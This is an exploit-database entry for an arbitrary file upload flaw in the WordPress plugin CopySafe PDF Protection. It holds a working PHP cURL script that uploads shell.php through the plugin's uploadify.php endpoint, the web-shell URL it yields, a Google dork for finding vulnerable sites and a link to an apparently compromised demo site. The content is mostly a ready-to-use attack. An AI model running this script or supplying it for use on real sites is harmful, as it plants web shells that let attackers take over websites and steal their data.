id: 22313
date: 06/03/2014
title: Wordpress Plugin CopySafe PDF Protection  Shell Upload (0day) Vulnerability
author: Aloulou
cves: 

############################################################################

#Title : Wordpress Plugin CopySafe PDF Protection Shell Upload Vulnerability    
# Author : Aloulou                                              
# Date : 01/06/2014                                                     
# Facebook : http://www.facebook.com/Aloulou.TN                                
# Email: aloulou@alquds.com
# Vendor : wordpress.org                                                     
# Google Dork : inurl:/plugins/wp-copysafe-pdf/
# Tested on : Linux 
                      
############################################################################

Exploit: 


<?php

$uploadfile="shell.php";

$ch = curl_init("http://127.0.0.1/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,
array('wpcsp_file'=>"@$uploadfile",'error'=>'-1'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

"0"---->successful

NOTE:showing output "0" means it is successfully uploaded with zero errors!

ShellAccess:

    
http://127.0.0.1/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/shell.php


Demo:http://thatisallfornow.com


# Greeting to : Tunisia ,  CyberPink , AnonBoy and all muslims 
 

############################################################################

#  0day.today [2023-03-22]  #